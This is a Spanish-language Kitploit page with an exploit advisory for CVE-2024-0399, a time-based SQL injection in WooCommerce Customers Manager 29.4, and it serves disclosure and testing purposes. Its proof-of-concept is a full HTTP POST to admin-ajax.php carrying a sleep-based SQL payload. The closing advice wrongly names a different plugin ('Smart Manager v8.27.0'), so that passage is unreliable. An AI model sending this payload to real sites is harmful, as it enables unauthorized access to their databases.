Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-0399 — Prueba de concepto de explotación para CVE-2024-0399, una inyección SQL basada en tiempo posterior a la autenticación en WooCommerce Customers Manager 29.4, dirigida a los parámetros del monto de transacción a través del endpoint AJAX de administración. | Kitploit
Herramientas/GitHubGitHub/xbz0n/cve-2024-0399
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónSeguridad de Bases de Datos
GitHubxbz0n/cve-2024-0399

CVE-2024-0399

Prueba de concepto de explotación para CVE-2024-0399, una inyección SQL basada en tiempo posterior a la autenticación en WooCommerce Customers Manager 29.4, dirigida a los parámetros del monto de transacción a través del endpoint AJAX de administración.

Ver Repositorio
11hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-0399 - WooCommerce Customers Manager 29.4 - Inyección SQL Post-Autenticación

Título del Exploit: WooCommerce Customers Manager 29.4 - Inyección SQL Post-Autenticación
Fecha: 2024-03-25
Autor del Exploit: Ivan Spiridonov - xbz0n
Enlace del Software: https://codecanyon.net/item/woocommerce-customers-manager/10965432
Versión: 29.4
Probado en: Ubuntu 22.04
CVE: CVE-2024-0399

Inyección SQL

El plugin no sanitiza ni escapa adecuadamente un parámetro antes de usarlo en una declaración SQL, lo que lleva a una inyección SQL explotable por roles de Suscriptor+.

Componentes Afectados

  • Plugin: WooCommerce Customers Manager
  • Versión: 29.4
  • Parámetros Afectados: 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
  • Endpoint Afectado: /wp-admin/admin-ajax.php

Descripción

La vulnerabilidad se encuentra dentro de los parámetros de cantidad de transacciones como 'max_amount', 'max_amount_total', 'min_amount' y 'min_amount_total' utilizados en el endpoint AJAX de administración. Al inyectar comandos SQL en estos parámetros, atacantes autenticados pueden manipular consultas SQL, lo que lleva a una vulnerabilidad de Inyección SQL basada en tiempo.

Prueba de Concepto

Explotación Manual

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
Content-Length: 1877
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="action"
wccm_get_orders_tot_num
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="start_date"
2024-01-09
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="end_date"
2024-01-11
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="customer_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="category_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount_total"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount_total"
(select*from(select(sleep(20)))a)
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_filters_relationship"
and
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="statuses"
wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
-----------------------------2461714219322283440478088295--

Si la respuesta del servidor se retrasa aproximadamente 20 segundos, indica una explotación exitosa de la Inyección SQL basada en tiempo, confirmando la vulnerabilidad.

Recomendaciones

Se recomienda encarecidamente a los usuarios de WooCommerce Customers Manager v29.4 que restrinjan el acceso al endpoint afectado y actualicen el plugin tan pronto como se publique una versión corregida. Este aviso sirve como notificación a todos los usuarios de Smart Manager v8.27.0 para que tomen medidas inmediatas y actualicen su plugin para protegerse contra esta vulnerabilidad de Inyección SQL.

Descargar herramienta